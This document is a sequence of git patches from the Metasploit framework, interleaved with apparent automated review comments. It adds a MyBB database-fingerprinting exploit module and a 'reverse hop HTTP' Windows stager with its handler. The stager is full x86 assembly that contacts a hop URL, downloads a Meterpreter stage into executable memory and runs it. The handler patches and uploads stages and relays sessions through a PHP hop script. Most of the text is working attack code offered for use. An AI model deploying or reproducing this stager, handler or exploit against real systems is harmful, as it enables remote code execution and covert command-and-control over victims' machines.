@@ -0,0 +1,118 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MyBB type database extractor', + 'Description' => %q{ + This module exploits vulnerability in MyBB. + Provide type of database in forum + This affects versions <= 1.6.12 + }, + 'Author' => + [ + 'Arthur Karmanovskii', # Discovery + 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ '0 - days', '2014-13-02' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) + ], self.class) + end + + def check + begin + print_status("URI: #{datastore['TARGETURI']}") + uri = normalize_uri(target_uri.path, '/index.php') + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Keep-Alive', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + rescue + print_error("Unable to connect to server.") + return CheckCode::Unknown + end + + if res.code != 200 + print_error("Unable to query to host") + return CheckCode::Unknown + end + + php_version = res['X-Powered-By'] + if php_version + print_good("PHP Version: #{php_version}") + else + print_status("Unknown PHP Version") + return CheckCode::Unknown + end + + _Version_server = res['Server'] + if _Version_server + print_good("Server Version: 
#{_Version_server}") + else + print_status("Unknown Server Version") + return CheckCode::Unknown + end + return CheckCode::Detected + end + + def exploit + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else response.body.match(/Member List/) + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + + end +end + From 5f7a0e162cebb3ae476d88acbc48c8b783efbb09 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Mon, 30 Dec 2013 01:23:40 -0600 Subject: [PATCH 018/853] Add reverse_hop_http stager and handler --- data/php/hop.php | 64 ++++ lib/msf/core/handler/reverse_hop_http.rb | 277 +++++++++++++++++ .../stagers/windows/reverse_hop_http.rb | 292 ++++++++++++++++++ 3 files changed, 633 insertions(+) create mode 100644 data/php/hop.php create mode 100644 lib/msf/core/handler/reverse_hop_http.rb create mode 100644 modules/payloads/stagers/windows/reverse_hop_http.rb diff --git a/data/php/hop.php b/data/php/hop.php new file mode 100644 index 0000000000..08cefe5df8 --- /dev/null +++ b/data/php/hop.php 
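Review bot: `check` calls `res.code` without first testing `res`, although `exploit` guards the same kind of request with `response.nil?`, so a request that returns nothing would raise NoMethodError rather than give `CheckCode::Unknown`. The guard should be `if res.nil? || res.code != 200`. In `exploit`, the last branch is written `else response.body.match(/Member List/)`, which evaluates the match and discards it, so the final message prints for every response that missed the first two patterns. Either make it `elsif response.body.match(/Member List/)` with a separate fallback, or drop the expression. The bare `rescue` in `check` also hides any error raised while building the request, not only connection failures, so naming the expected exception classes would be safer.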
@@ -0,0 +1,64 @@ + framework + } + ) + #First we need to verify we will not stomp on another handler's hop + if @@hophandlers.has_key? full_uri + raise RuntimeError, "Already running a handler for hop #{full_uri}." + end + @@hophandlers[full_uri] = self + self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, + self) do |uri, hophttp| + control = "#{uri.request_uri}control" + hophttp.control = control + hophttp.send_new_stage(control) # send stage to hop + @finish = false + delay = 1 # poll delay + until @finish and hophttp.handlers.empty? + sleep delay + delay = delay + 1 if delay < 10 # slow down if we're not getting anything + crequest = hophttp.mclient.request_raw({'method' => 'GET', 'uri' => control}) + res = hophttp.mclient.send_recv(crequest) # send poll to the hop + if res.error + print_error(res.error) + next + end + + # validate response + received = res.body + magic = hophttp.magic + next if received.length < 12 or received.slice!(0, magic.length) != magic + + # good response + delay = 0 # we're talking, speed up + urlen = received.slice!(0,4).unpack('V')[0] + urlpath = received.slice!(0,urlen) + + #received is now the binary contents of the message + if hophttp.handlers.include? urlpath + pack = Rex::Proto::Http::Packet.new + pack.body = received + hophttp.current_url = urlpath + hophttp.handlers[urlpath].call(hophttp, pack) + else + #New session! + conn_id = urlpath.gsub("/","") + # Short-circuit the payload's handle_connection processing for create_session + # We are the dispatcher since we need to handle the comms to the hop + create_session(hophttp, { + :passive_dispatcher => self, + :conn_id => conn_id, + :url => urlpath, + :expiration => datastore['SessionExpirationTimeout'].to_i, + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, + :ssl => false, + }) + # send new stage to hop so next inbound session will get a unique ID. 
+ hophttp.send_new_stage(control) + end + end + hophttp.monitor_thread = nil #make sure we're out + @@hophandlers.delete(full_uri) + end + end + + # + # Stops the handler and monitoring thread + # + def stop_handler + @finish = true + end + + # + # Adds a resource. (handler for a session) + # + def add_resource(res, opts={}) + self.handlers[res] = opts['Proc'] + start_handler if self.monitor_thread == nil + end + + # + # Removes a resource. + # + def remove_resource(res) + self.handlers.delete(res) + end + + # + # Implemented for compatibility reasons, does nothing + # + def close_client(cli) + end + + # + # Sends data to hop + # + def send_response(resp) + if not resp.body.empty? + crequest = self.mclient.request_raw( + 'method' => 'POST', + 'uri' => self.control, + 'data' => resp.body, + 'headers' => {'X-urlfrag' => self.current_url} + ) + # if receiving POST data, hop does not send back data, so we can stop here + self.mclient.send_recv(crequest) + end + end + + # + # Return the URI of the hop point. + # + def full_uri + uri = datastore['HOPURL'] + return uri if uri.end_with? '/' + return "#{uri}/" if uri.end_with? '?' + "#{uri}?/" + end + + # + # Returns a string representation of the local hop + # + def localinfo + "Hop client" + end + + # + # Returns the URL of the remote hop end + # + def peerinfo + URI(full_uri).host + end + + # + # Initializes the Hop HTTP tunneling handler. + # + def initialize(info = {}) + super + + register_options( + [ + OptString.new('HOPURL', [ true, "The full URL of the hop script, e.g. 
http://a.b/hop.php" ]) + ], Msf::Handler::ReverseHopHttp) + + end + + # + # Generates and sends a stage up to the hop point to be ready for the next client + # + def send_new_stage(control) + conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) + url = full_uri + conn_id + "/\x00" + + print_status("Preparing stage for next session #{conn_id}") + blob = self.stage_payload + + # Replace the user agent string with our option + i = blob.index("METERPRETER_UA\x00") + if i + str = datastore['MeterpreterUserAgent'][0,255] + "\x00" + blob[i, str.length] = str + end + + # Replace the transport string first (TRANSPORT_SOCKET_SSL) + i = blob.index("METERPRETER_TRANSPORT_SSL") + if i + str = "METERPRETER_TRANSPORT_HTTP#{ssl? ? "S" : ""}\x00" + blob[i, str.length] = str + end + + conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) + i = blob.index("https://" + ("X" * 256)) + if i + url = full_uri + conn_id + "/\x00" + blob[i, url.length] = url + end + print_status("Patched URL at offset #{i}...") + + i = blob.index([0xb64be661].pack("V")) + if i + str = [ datastore['SessionExpirationTimeout'] ].pack("V") + blob[i, str.length] = str + end + + i = blob.index([0xaf79257f].pack("V")) + if i + str = [ datastore['SessionCommunicationTimeout'] ].pack("V") + blob[i, str.length] = str + end + + blob = encode_stage(blob) + + #send up + crequest = self.mclient.request_raw( + 'method' => 'POST', + 'uri' => control, + 'data' => blob, + 'headers' => {'X-init' => 'true'} + ) + res = self.mclient.send_recv(crequest) + print_status("Uploaded stage to hop #{full_uri}") + print_error(res.error) if res.error + + #return conn info + [conn_id, url] + end + + attr_accessor :monitor_thread # :nodoc: + attr_accessor :handlers # :nodoc: + attr_accessor :mclient # :nodoc: + attr_accessor :current_url # :nodoc: + attr_accessor :control # :nodoc: + +end + +end +end + 
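Review bot: `send_new_stage` assigns `conn_id` and `url` twice, and the status line `Preparing stage for next session #{conn_id}` prints the first value while the second one is patched into the blob and returned. The logged ID therefore never matches the ID the stage carries, and if the `https://` placeholder is not found the method returns the second `conn_id` with a `url` built from the first. Removing the second `conn_id = generate_uri_checksum(...)` line and the `url = ...` assignment inside `if i` keeps a single ID throughout. `print_status("Patched URL at offset #{i}...")` also runs when `i` is nil, so it should move inside the `if i` block. The start of this file section is not intact on this page, so only the visible part of the handler was reviewed.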
diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb new file mode 100644 index 0000000000..dbe5fea11d --- /dev/null +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb 
@@ -0,0 +1,292 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'uri' +require 'msf/core' +require 'msf/core/handler/reverse_hop_http' + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Reverse Hop HTTP Stager', + 'Description' => 'Tunnel communication over an HTTP hop point', + 'Author' => ['scriptjunkie ', 'hdm'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseHopHttp, + 'Convention' => 'sockedi http', + 'Stager' => + { + 'Offsets' => + { + # None, they get embedded in the shellcode + } + } + )) + + deregister_options('LHOST', 'LPORT') + + register_options([ + OptString.new('HOPURL', + [ true, "The full URL of the hop script", "http://example.com/hop.php" ] + ) + ], self.class) + end + + # + # Do not transmit the stage over the connection. We handle this via HTTP + # + def stage_over_connection? 
+ false + end + + # + # Generate the first stage + # + def generate + uri = URI(datastore['HOPURL']) + #create actual payload + payload_data = <Ldr + mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list +next_mod: + mov esi, [edx+40] ; Get pointer to modules name (unicode string) + movzx ecx, word [edx+38] ; Set ECX to the length we want to check + xor edi, edi ; Clear EDI which will store the hash of the module name +loop_modname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the name + cmp al, 'a' ; Some versions of Windows use lower case module names + jl not_lowercase ; + sub al, 0x20 ; If so normalise to uppercase +not_lowercase: ; + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + loop loop_modname ; Loop until we have read enough + ; We now have the module hash computed + push edx ; Save the current position in the module list for later + push edi ; Save the current module hash for later + ; Proceed to iterate the export address table, + mov edx, [edx+16] ; Get this modules base address + mov eax, [edx+60] ; Get PE header + add eax, edx ; Add the modules base address + mov eax, [eax+120] ; Get export tables RVA + test eax, eax ; Test if no export address table is present + jz get_next_mod1 ; If no EAT present, process the next module + add eax, edx ; Add the modules base address + push eax ; Save the current modules EAT + mov ecx, [eax+24] ; Get the number of function names + mov ebx, [eax+32] ; Get the rva of the function names + add ebx, edx ; Add the modules base address + ; Computing the module hash + function hash +get_next_func: ; + jecxz get_next_mod ; When we reach the start of the EAT (we search backwards) process next mod + dec ecx ; Decrement the function name counter + mov esi, [ebx+ecx*4] ; Get rva of next module name + add esi, edx ; Add the modules base address + xor edi, edi ; Clear EDI which will store the hash of the function name + ; And compare it to the 
one we want +loop_funcname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the ASCII function name + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + cmp al, ah ; Compare AL (the next byte from the name) to AH (null) + jne loop_funcname ; If we have not reached the null terminator, continue + add edi, [ebp-8] ; Add the current module hash to the function hash + cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for + jnz get_next_func ; Go compute the next function hash if we have not found it + ; If found, fix up stack, call the function and then value else compute the next one... + pop eax ; Restore the current modules EAT + mov ebx, [eax+36] ; Get the ordinal table rva + add ebx, edx ; Add the modules base address + mov cx, [ebx+2*ecx] ; Get the desired functions ordinal + mov ebx, [eax+28] ; Get the function addresses table rva + add ebx, edx ; Add the modules base address + mov eax, [ebx+4*ecx] ; Get the desired functions RVA + add eax, edx ; Add the modules base address to get the functions actual VA + ; We now fix up the stack and perform the call to the desired function... +finish: + mov [esp+36], eax ; Overwrite the old EAX value with the desired api address + pop ebx ; Clear off the current modules hash + pop ebx ; Clear off the current position in the module list + popad ; Restore all of the callers registers, bar EAX, ECX and EDX + pop ecx ; Pop off the origional return address our caller will have pushed + pop edx ; Pop off the hash value our caller will have pushed + push ecx ; Push back the correct return value + jmp eax ; Jump into the required function + ; We now automagically return to the correct caller... 
+get_next_mod: ; + pop eax ; Pop off the current (now the previous) modules EAT +get_next_mod1: ; + pop edi ; Pop off the current (now the previous) modules hash + pop edx ; Restore our position in the module list + mov edx, [edx] ; Get the next module + jmp.i8 next_mod ; Process this module + +; actual routine +start: + pop ebp ; get ptr to block_api routine + +; Input: EBP must be the address of 'api_call'. +; Output: EDI will be the socket for the connection to the server +; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) +load_wininet: + push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. + push 0x696e6977 ; ... + push esp ; Push a pointer to the "wininet" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "wininet" ) + +internetopen: + xor edi,edi + push edi ; DWORD dwFlags + push edi ; LPCTSTR lpszProxyBypass + push edi ; LPCTSTR lpszProxyName + push edi ; DWORD dwAccessType (PRECONFIG = 0) + push 0 ; NULL pointer + push esp ; LPCTSTR lpszAgent ("\x00") + push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + call ebp + + jmp.i8 dbl_get_server_host + +internetconnect: + pop ebx ; Save the hostname pointer + xor ecx, ecx + push ecx ; DWORD_PTR dwContext (NULL) + push ecx ; dwFlags + push 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) + push ecx ; password + push ecx ; username + push #{uri.port} ; PORT + push ebx ; HOSTNAME + push eax ; HINTERNET hInternet + push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + call ebp + + jmp get_server_uri + +httpopenrequest: + pop ecx + xor edx, edx ; NULL + push edx ; dwContext (NULL) + push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags + ;0x80000000 | ; INTERNET_FLAG_RELOAD + ;0x04000000 | ; INTERNET_NO_CACHE_WRITE + ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + ;0x00000200 | ; INTERNET_FLAG_NO_UI + ;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION + push edx ; accept types + push edx ; referrer + push edx ; 
version + push ecx ; url + push edx ; method + push eax ; hConnection + push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + call ebp + mov esi, eax ; hHttpRequest + +set_retry: + push 0x10 + pop ebx + +httpsendrequest: + xor edi, edi + push edi ; optional length + push edi ; optional + push edi ; dwHeadersLength + push edi ; headers + push esi ; hHttpRequest + push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + call ebp + test eax,eax + jnz allocate_memory + +try_it_again: + dec ebx + jz failure + jmp.i8 httpsendrequest + +dbl_get_server_host: + jmp get_server_host + +get_server_uri: + call httpopenrequest + +server_uri: + db "#{Rex::Text.hexify(uri.request_uri).chomp}?/12345", 0x00 + +failure: + push 0x56A2B5F0 ; hardcoded to exitprocess for size + call ebp + +allocate_memory: + push 0x40 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; MEM_COMMIT + push 0x00400000 ; Stage allocation (8Mb ought to do us) + push edi ; NULL as we dont care where the allocation is + push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + +download_prep: + xchg eax, ebx ; place the allocated base address in ebx + push ebx ; store a copy of the stage base address on the stack + push ebx ; temporary storage for bytes read count + mov edi, esp ; &bytesRead + +download_more: + push edi ; &bytesRead + push 8192 ; read length + push ebx ; buffer + push esi ; hRequest + push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + call ebp + + test eax,eax ; download failed? (optional?) + jz failure + + mov eax, [edi] + add ebx, eax ; buffer += bytes_received + + test eax,eax ; optional? 
+ jnz download_more ; continue until it returns 0 + pop eax ; clear the temporary storage + +execute_stage: + ret ; dive into the stored stage address + +get_server_host: + call internetconnect + +server_host: +db "#{Rex::Text.hexify(uri.host).chomp}", 0x00 + +EOS + self.module_info['Stager']['Assembly'] = payload_data.to_s + super + end + + # + # Always wait at least 20 seconds for this payload (due to staging delays) + # + def wfs_delay + 20 + end +end From 85ae32775aa2dd2652a783b1689b8bf7b542d5e3 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Mon, 30 Dec 2013 23:20:15 -0600 Subject: [PATCH 019/853] Fix to make migrate work; use the full URL. --- lib/msf/core/handler/reverse_hop_http.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index 71e27d68d9..e80fc9370c 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -108,7 +108,7 @@ module ReverseHopHttp create_session(hophttp, { :passive_dispatcher => self, :conn_id => conn_id, - :url => urlpath, + :url => uri.to_s + conn_id + "/\x00", :expiration => datastore['SessionExpirationTimeout'].to_i, :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, :ssl => false, From 62f42c57a92e4e43223b6e13eaa1bbcaefe22fab Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Mon, 30 Dec 2013 23:38:09 -0600 Subject: [PATCH 020/853] Add instructions for uploading hop.php --- modules/payloads/stagers/windows/reverse_hop_http.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index dbe5fea11d..9109738220 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb 
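Review bot: The comment on the `VirtualAlloc` size in `allocate_memory` says 8Mb, but `0x00400000` is 4 MiB, and the `download_more` loop below it advances `ebx` by the bytes read without ever comparing the running total against that size. I would correct the comment to `; Stage allocation (4 MiB); download_more does not check this limit` so the real ceiling is documented where the constant lives. The file header also has a malformed URL, `http//metasploit.com/download`, which should read `http://metasploit.com/download`.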
@@ -15,7 +15,9 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse Hop HTTP Stager', - 'Description' => 'Tunnel communication over an HTTP hop point', + 'Description' => "Tunnel communication over an HTTP hop point (note you must first upload "+ + "the hop.php found at #{File.expand_path("../../../../data/php/hop.php", __FILE__)} "+ + "to the HTTP server you wish to use as a hop)", 'Author' => ['scriptjunkie ', 'hdm'], 'License' => MSF_LICENSE, 'Platform' => 'win', From a6a731c8ee937abc4678f0f3049c67840e9a246f Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Fri, 3 Jan 2014 17:13:42 -0600 Subject: [PATCH 021/853] Keep stage until replaced, nil check, prettify. --- data/php/hop.php | 2 +- lib/msf/core/handler/reverse_hop_http.rb | 29 ++++++++++++------------ 2 files changed, 16 insertions(+), 15 deletions(-) diff --git a/data/php/hop.php b/data/php/hop.php index 08cefe5df8..d7ab92e82c 100644 --- a/data/php/hop.php +++ b/data/php/hop.php @@ -60,5 +60,5 @@ if($url === "/control"){ fclose($f); //Initial query will be a GET and have a 12345 in it }else if(strpos($url, "12345") !== FALSE){ - findSendDelete($tempdir, "init"); + readfile($tempdir."/init"); } diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index e80fc9370c..4a9f458f5b 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb 
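Review bot: `readfile($tempdir."/init")` runs without checking that the file exists, whereas the `findSendDelete` call it replaces only touched files that `readdir` had actually returned. Before any stage has been uploaded, a request containing `12345` makes PHP emit a warning, and with `display_errors` enabled that warning puts the temp directory path into the response. Guarding the call keeps the old silent behaviour: `$init = $tempdir."/init";` followed by `if(is_file($init)){ readfile($init); }`.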
@@ -68,17 +68,18 @@ module ReverseHopHttp end @@hophandlers[full_uri] = self self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, - self) do |uri, hophttp| + self) do |uri, hop_http| control = "#{uri.request_uri}control" - hophttp.control = control - hophttp.send_new_stage(control) # send stage to hop + hop_http.control = control + hop_http.send_new_stage(control) # send stage to hop @finish = false delay = 1 # poll delay - until @finish and hophttp.handlers.empty? + until @finish and hop_http.handlers.empty? sleep delay delay = delay + 1 if delay < 10 # slow down if we're not getting anything - crequest = hophttp.mclient.request_raw({'method' => 'GET', 'uri' => control}) - res = hophttp.mclient.send_recv(crequest) # send poll to the hop + crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control}) + res = hop_http.mclient.send_recv(crequest) # send poll to the hop + next if res == nil if res.error print_error(res.error) next @@ -86,7 +87,7 @@ module ReverseHopHttp # validate response received = res.body - magic = hophttp.magic + magic = hop_http.magic next if received.length < 12 or received.slice!(0, magic.length) != magic # good response @@ -95,17 +96,17 @@ module ReverseHopHttp urlpath = received.slice!(0,urlen) #received is now the binary contents of the message - if hophttp.handlers.include? urlpath + if hop_http.handlers.include? urlpath pack = Rex::Proto::Http::Packet.new pack.body = received - hophttp.current_url = urlpath - hophttp.handlers[urlpath].call(hophttp, pack) + hop_http.current_url = urlpath + hop_http.handlers[urlpath].call(hop_http, pack) else #New session! conn_id = urlpath.gsub("/","") # Short-circuit the payload's handle_connection processing for create_session # We are the dispatcher since we need to handle the comms to the hop - create_session(hophttp, { + create_session(hop_http, { :passive_dispatcher => self, :conn_id => conn_id, :url => uri.to_s + conn_id + "/\x00", 
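Review bot: In the new-session branch, `conn_id` is derived from `urlpath`, which is read out of the hop's response body, and it goes into the session `:url` with only the slashes stripped. Anything that can write into the hop's temp directory can therefore choose the identifier the handler registers, so I would check it against the shape `send_new_stage` generates before calling `create_session`, with something like `next unless conn_id =~ /\A[\w-]+\z/`. The length prefix behind `urlpath = received.slice!(0,urlen)` is likewise taken on trust, and a short body simply yields a truncated path. The enclosing thread block starts and ends outside this hunk.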
@@ -114,10 +115,10 @@ module ReverseHopHttp :ssl => false, }) # send new stage to hop so next inbound session will get a unique ID. - hophttp.send_new_stage(control) + hop_http.send_new_stage(control) end end - hophttp.monitor_thread = nil #make sure we're out + hop_http.monitor_thread = nil #make sure we're out @@hophandlers.delete(full_uri) end end @@ -258,7 +259,7 @@ module ReverseHopHttp ) res = self.mclient.send_recv(crequest) print_status("Uploaded stage to hop #{full_uri}") - print_error(res.error) if res.error + print_error(res.error) if res != nil and res.error #return conn info [conn_id, url] From 16e1280b8d25b7aa586863ad1ab68db837bdc8bb Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Mon, 6 Jan 2014 20:51:03 -0600 Subject: [PATCH 022/853] Style guide fixes. --- lib/msf/core/handler/reverse_hop_http.rb | 43 ++++++++++++------------ 1 file changed, 22 insertions(+), 21 deletions(-) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index 4a9f458f5b..875189ccc6 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -18,14 +18,23 @@ module ReverseHopHttp include Msf::Handler::ReverseHttp - @@hophandlers = {} # Keeps track of what hops have active handlers - # # Magic bytes to know we are talking to a valid hop # - def magic - 'TzGq' - end + MAGIC = 'TzGq' + + # hop_handlers is a class-level instance variable + class << self; attr_accessor :hop_handlers end + attr_accessor :monitor_thread # :nodoc: + attr_accessor :handlers # :nodoc: + attr_accessor :mclient # :nodoc: + attr_accessor :current_url # :nodoc: + attr_accessor :control # :nodoc: + + # + # Keeps track of what hops have active handlers + # + @hop_handlers = {} # # Returns the string representation of the handler type 
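Review bot: In the `send_new_stage` hunk, `print_status("Uploaded stage to hop ...")` is printed before the response is examined, so it also appears when `send_recv` returned nil or an error. The new nil guard only prevents the crash; a nil response is then dropped without any message. I would report it, e.g. `print_error("No response from hop #{full_uri}") if res.nil?`, and move the status line so that it prints only when `res` is present and `res.error` is empty. The method starts outside this hunk.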
@@ -63,10 +72,10 @@ module ReverseHopHttp } ) #First we need to verify we will not stomp on another handler's hop - if @@hophandlers.has_key? full_uri + if ReverseHopHttp.hop_handlers.has_key?(full_uri) raise RuntimeError, "Already running a handler for hop #{full_uri}." end - @@hophandlers[full_uri] = self + ReverseHopHttp.hop_handlers[full_uri] = self self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, self) do |uri, hop_http| control = "#{uri.request_uri}control" @@ -74,7 +83,7 @@ module ReverseHopHttp hop_http.send_new_stage(control) # send stage to hop @finish = false delay = 1 # poll delay - until @finish and hop_http.handlers.empty? + until @finish && hop_http.handlers.empty? sleep delay delay = delay + 1 if delay < 10 # slow down if we're not getting anything crequest = hop_http.mclient.request_raw({'method' => 'GET', 'uri' => control}) @@ -87,8 +96,7 @@ module ReverseHopHttp # validate response received = res.body - magic = hop_http.magic - next if received.length < 12 or received.slice!(0, magic.length) != magic + next if received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC # good response delay = 0 # we're talking, speed up @@ -119,7 +127,7 @@ module ReverseHopHttp end end hop_http.monitor_thread = nil #make sure we're out - @@hophandlers.delete(full_uri) + ReverseHopHttp.hop_handlers.delete(full_uri) end end @@ -172,8 +180,8 @@ module ReverseHopHttp # def full_uri uri = datastore['HOPURL'] - return uri if uri.end_with? '/' - return "#{uri}/" if uri.end_with? '?' + return uri if uri.end_with?('/') + return "#{uri}/" if uri.end_with?('?') "#{uri}?/" end 
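Review bot: The `has_key?` check and the `hop_handlers[full_uri] = self` assignment in `start_handler` are two separate steps on a hash shared by every handler, and the monitor thread deletes from the same hash at `hop_handlers.delete(full_uri)` in a later hunk of this commit. If two handlers for the same hop can start concurrently (not visible from here), both can pass the check and each register itself. A module-level mutex around the check-and-set and around the delete would close that, e.g. `HOP_LOCK = Mutex.new` (name constructed for illustration) next to `@hop_handlers = {}` and `HOP_LOCK.synchronize { ... }` at both sites. The `refs += 1` and `refs -= 1` updates added by the following commit touch the same shared state and need the same protection.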
@@ -259,20 +267,13 @@ module ReverseHopHttp ) res = self.mclient.send_recv(crequest) print_status("Uploaded stage to hop #{full_uri}") - print_error(res.error) if res != nil and res.error + print_error(res.error) if res != nil && res.error #return conn info [conn_id, url] end - attr_accessor :monitor_thread # :nodoc: - attr_accessor :handlers # :nodoc: - attr_accessor :mclient # :nodoc: - attr_accessor :current_url # :nodoc: - attr_accessor :control # :nodoc: - end end end - From 9c8c16d238d7424d47cb6b5483fe539c6319a923 Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Tue, 7 Jan 2014 16:15:38 -0600 Subject: [PATCH 023/853] Allow multiple handlers to use same hop. --- lib/msf/core/handler/reverse_hop_http.rb | 23 +++++++++++++++++------ 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index 875189ccc6..d9911b12ec 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -30,6 +30,7 @@ module ReverseHopHttp attr_accessor :mclient # :nodoc: attr_accessor :current_url # :nodoc: attr_accessor :control # :nodoc: + attr_accessor :refs # :nodoc: # # Keeps track of what hops have active handlers @@ -63,7 +64,7 @@ module ReverseHopHttp # def start_handler uri = URI(full_uri) - #Our HTTP client for talking to the hop + # Our HTTP client for talking to the hop self.mclient = Rex::Proto::Http::Client.new( uri.host, uri.port, 
@@ -71,19 +72,25 @@ module ReverseHopHttp 'Msf' => framework } ) - #First we need to verify we will not stomp on another handler's hop + @running = true # So we know we can stop it + # If someone is already monitoring this hop, bump the refcount instead of starting a new thread if ReverseHopHttp.hop_handlers.has_key?(full_uri) - raise RuntimeError, "Already running a handler for hop #{full_uri}." + ReverseHopHttp.hop_handlers[full_uri].refs += 1 + return end + + # Sometimes you just have to do everything yourself. + # Declare ownership of this hop and spawn a thread to monitor it. + self.refs = 1 ReverseHopHttp.hop_handlers[full_uri] = self self.monitor_thread = Rex::ThreadFactory.spawn('ReverseHopHTTP', false, uri, self) do |uri, hop_http| control = "#{uri.request_uri}control" hop_http.control = control hop_http.send_new_stage(control) # send stage to hop - @finish = false delay = 1 # poll delay - until @finish && hop_http.handlers.empty? + # Continue to loop as long as at least one handler or one session is depending on us + until hop_http.refs < 1 && hop_http.handlers.empty? sleep delay delay = delay + 1 